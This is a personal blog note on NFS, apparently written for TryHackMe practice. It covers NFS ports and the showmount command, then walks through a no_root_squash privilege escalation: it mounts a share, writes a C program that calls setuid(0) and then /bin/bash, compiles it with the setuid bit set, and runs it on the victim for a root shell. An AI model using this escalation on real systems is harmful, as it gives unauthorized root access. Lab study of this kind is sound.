Skip to main content

NFS: Notes

NFS - Source: https://www.mayagraphics.gr/images/upload/Works122-lo20-8587413302009850261-s1.jpg

NFS - Network File System

To allow NFS traffic throught a firewall these ports need to be open:

  • NFS Daemon (NFSD): Runs on NFS servers and uses port 2049 for both TCP and UDP
  • Portmapper: Uses port 111 for both TCP and UDP
  • Mount daemon (mountd): Uses port 20048, which is specified in /etc/services

Show mounts on remote NFS server

# showmount -e 10.10.177.215
Export list for 10.10.177.215:
/opt/conf *
#

NFS exploit

Example of no_root_squash

[paradox@localhost tmp]$ cat /etc/exports
cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
[paradox@localhost tmp]$

Yet another example of no_root_squash

john@enterprize:~$ cat /etc/exports
cat /etc/exports
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
john@enterprize:~$

On attack machine

# mkdir /tmp/nfs

# mount -o rw,vers=2 10.10.178.28:/tmp /tmp/nfs
mount: /tmp/nfs: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

First mount failed

# mount -o rw,vers=2 10.10.79.232:/home/james /tmp/pe
mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
#

# apt install nfs-common
# service rpcbind restart
# service statd start

# mount -o rw,vers=2 localhost:/home/james /tmp/nfs
mount.nfs: requested NFS version or transport protocol is not supported

apt install nfs-common nfs4-acl-tools

root@T420:/tmp/nfs# mount -o rw,vers=2 10.10.64.107:/var/nfs/general /tmp/nfs
mount.nfs: Protocol not supported
root@T420:/tmp/nfs# mount -o rw,vers=4 10.10.64.107:/var/nfs/general /tmp/nfs
root@T420:/tmp/nfs# ls /tmp/nfs
credentials.bak
root@T420:/tmp/nfs#

# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/nfs/x.c
# gcc /tmp/nfs/x.c -o /tmp/nfs/x
# chmod +s /tmp/nfs/x

On NFS server (victim) machine

$ /tmp/x
#

References

NFS no_root_squash/no_all_squash misconfiguration PE

Network File System on Wikepedia

Practice

>>> THM | Network Services 2

>>> THM | Linux PrivEsc - Task 19 - NFS

>>> THM | Linux Priv Esc Arena - Task 19 - Privilege Escalation - NFS Root Squashing

>>> THM | Overpass 3 - Hosting

>>> THM | Enterprize

>>> THM | VulnNet: Internal

Labels:

Popular posts from this blog

IIS: Delete cached files on server running IIS

Delete cached files on server running IIS When changing css, javascript files, check to delete if IIS still caches old files in the default folder C:\inetpub\temp\IIS Temporary Compressed Files\<sitename>\$^_gzip_D^\ Apply to: IIS 8.5
Read more

Linux command: du - disk usage

Where have all my storage gone? du summarize disk usage of the set of FILEs, recursively for directories.
Read more

ManageEngine ServiceDesk Plus - Reset password

Let's reset the default administrator's password to 'admin'
Read more